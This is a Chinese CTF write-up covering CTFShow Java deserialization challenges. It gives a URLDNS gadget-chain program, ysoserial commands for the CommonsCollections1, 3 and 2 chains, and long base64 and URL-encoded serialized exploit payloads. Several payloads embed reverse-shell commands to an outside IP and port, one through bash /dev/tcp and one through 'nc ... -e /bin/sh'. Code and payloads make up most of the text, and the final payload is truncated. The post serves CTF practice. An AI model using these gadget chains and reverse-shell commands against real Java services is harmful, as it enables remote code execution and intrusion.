当前位置:   article > 正文

【Web】CTFSHOW java反序列化刷题记录(部分)

【Web】CTFSHOW java反序列化刷题记录(部分)

目录

web846

web847

web848

web849

web850

web856

web857

web858


web846

直接拿URLDNS链子打就行

  1. import java.io.ByteArrayOutputStream;
  2. import java.io.IOException;
  3. import java.io.ObjectOutput;
  4. import java.io.ObjectOutputStream;
  5. import java.lang.reflect.Field;
  6. import java.net.URL;
  7. import java.util.Base64;
  8. import java.util.HashMap;
  9. public class URLDNS {
  10. public static void serialize(Object obj) throws IOException{
  11. ByteArrayOutputStream data =new ByteArrayOutputStream();
  12. ObjectOutput oos =new ObjectOutputStream(data);
  13. oos.writeObject(obj);
  14. oos.flush();
  15. oos.close();
  16. System.out.println(Base64.getEncoder().encodeToString(data.toByteArray()));
  17. };
  18. public static void main(String[] args) throws Exception{
  19. URL url=new URL("http://68421999-595d-43ef-bbd8-f10c88147a01.challenge.ctf.show/");
  20. Class<?> c=url.getClass();
  21. Field hashcode=c.getDeclaredField("hashCode");
  22. hashcode.setAccessible(true);
  23. hashcode.set(url,1);
  24. HashMap<URL,Integer> h = new HashMap<URL,Integer>();
  25. h.put(url,1);
  26. hashcode.set(url,-1);
  27. serialize(h);
  28. }
  29. }

payload:

ctfshow=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//3QANzY4NDIxOTk5LTU5NWQtNDNlZi1iYmQ4LWYxMGM4ODE0N2EwMS5jaGFsbGVuZ2UuY3RmLnNob3d0AAEvcQB+AAV0AARodHRwcHhzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXg=

也可直接用ysoserial

java -jar ysoserial.jar URLDNS "http://712840a9-ddc9-49a5-9e08-b29d74fe9910.challenge.ctf.show/"|base64

web847

有关CC链:CC链 1-7 分析 - 先知社区

题目提示:

用CC1打就行

先生成反弹shell的payload:

java -jar ysoserial.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

生成的payload放bp自带的decoder里进行一次url全编码

get方式传参

监听,成功反弹shell

web848

TransformedMap也被ban了,CC1不能打了,换CC3

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

除了payload要post传参,get传参长度太长会报错,其他流程都一样

payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%49%77%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%41%51%42%34%64%58%49%41%45%6c%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%4e%73%59%58%4e%7a%4f%36%73%57%31%36%37%4c%7a%56%71%5a%41%67%41%41%65%48%41%41%41%41%41%42%64%6e%49%41%48%57%70%68%64%6d%46%34%4c%6e%68%74%62%43%35%30%63%6d%46%75%63%32%5a%76%63%6d%30%75%56%47%56%74%63%47%78%68%64%47%56%7a%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%4e%79%41%42%46%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%53%47%46%7a%61%45%31%68%63%41%55%48%32%73%48%44%46%6d%44%52%41%77%41%43%52%67%41%4b%62%47%39%68%5a%45%5a%68%59%33%52%76%63%6b%6b%41%43%58%52%6f%63%6d%56%7a%61%47%39%73%5a%48%68%77%50%30%41%41%41%41%41%41%41%41%42%33%43%41%41%41%41%42%41%41%41%41%41%41%65%48%68%32%63%67%41%53%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%32%5a%58%4a%79%61%57%52%6c%41%41%41%41%41%41%41%41%41%41%41%41%41%41%42%34%63%48%45%41%66%67%41%75

web849

 用CC2打

然后用nc来反弹shell

nc 124.222.136.33 1337 -e /bin/sh
java -jar ysoserial.jar CommonsCollections2 "nc 124.222.136.33 1337 -e /bin/sh "|base64 

最终payload:

ctfshow=%72%4f%30%41%42%58%4e%79%41%42%64%71%59%58%5a%68%4c%6e%56%30%61%57%77%75%55%48%4a%70%62%33%4a%70%64%48%6c%52%64%57%56%31%5a%5a%54%61%4d%4c%54%37%50%34%4b%78%41%77%41%43%53%51%41%45%63%32%6c%36%5a%55%77%41%43%6d%4e%76%62%58%42%68%0a%63%6d%46%30%62%33%4a%30%41%42%5a%4d%61%6d%46%32%59%53%39%31%64%47%6c%73%4c%30%4e%76%62%58%42%68%63%6d%46%30%62%33%49%37%65%48%41%41%41%41%41%43%63%33%49%41%51%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%0a%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%61%57%35%6e%51%32%39%74%63%47%46%79%59%58%52%76%63%69%2f%35%68%50%41%72%73%51%6a%4d%0a%41%67%41%43%54%41%41%4a%5a%47%56%6a%62%33%4a%68%64%47%56%6b%63%51%42%2b%41%41%46%4d%41%41%74%30%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6e%51%41%4c%55%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%0a%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%30%4c%31%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4f%33%68%77%63%33%49%41%51%47%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%0a%61%57%39%75%63%7a%51%75%59%32%39%74%63%47%46%79%59%58%52%76%63%6e%4d%75%51%32%39%74%63%47%46%79%59%57%4a%73%5a%55%4e%76%62%58%42%68%63%6d%46%30%62%33%4c%37%39%4a%6b%6c%75%47%36%78%4e%77%49%41%41%48%68%77%63%33%49%41%4f%32%39%79%0a%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%7a%51%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%53%57%35%32%62%32%74%6c%63%6c%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%0a%68%2b%6a%2f%61%33%74%38%7a%6a%67%43%41%41%4e%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%4d%41%41%74%70%54%57%56%30%61%47%39%6b%54%6d%46%74%5a%58%51%41%0a%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%31%73%41%43%32%6c%51%59%58%4a%68%62%56%52%35%63%47%56%7a%64%41%41%53%57%30%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%31%0a%63%67%41%54%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%54%32%4a%71%5a%57%4e%30%4f%35%44%4f%57%4a%38%51%63%79%6c%73%41%67%41%41%65%48%41%41%41%41%41%41%64%41%41%4f%62%6d%56%33%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%31%0a%63%67%41%53%57%30%78%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%51%32%78%68%63%33%4d%37%71%78%62%58%72%73%76%4e%57%70%6b%43%41%41%42%34%63%41%41%41%41%41%42%33%42%41%41%41%41%41%4e%7a%63%67%41%36%59%32%39%74%4c%6e%4e%31%62%69%35%76%0a%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6e%68%68%62%47%46%75%4c%6d%6c%75%64%47%56%79%62%6d%46%73%4c%6e%68%7a%62%48%52%6a%4c%6e%52%79%59%58%67%75%56%47%56%74%63%47%78%68%64%47%56%7a%53%57%31%77%62%41%6c%58%54%38%46%75%72%4b%73%7a%0a%41%77%41%47%53%51%41%4e%58%32%6c%75%5a%47%56%75%64%45%35%31%62%57%4a%6c%63%6b%6b%41%44%6c%39%30%63%6d%46%75%63%32%78%6c%64%45%6c%75%5a%47%56%34%57%77%41%4b%58%32%4a%35%64%47%56%6a%62%32%52%6c%63%33%51%41%41%31%74%62%51%6c%73%41%0a%42%6c%39%6a%62%47%46%7a%63%33%45%41%66%67%41%4c%54%41%41%46%58%32%35%68%62%57%56%78%41%48%34%41%43%6b%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%0a%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%0a%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%75%73%72%2b%75%72%34%41%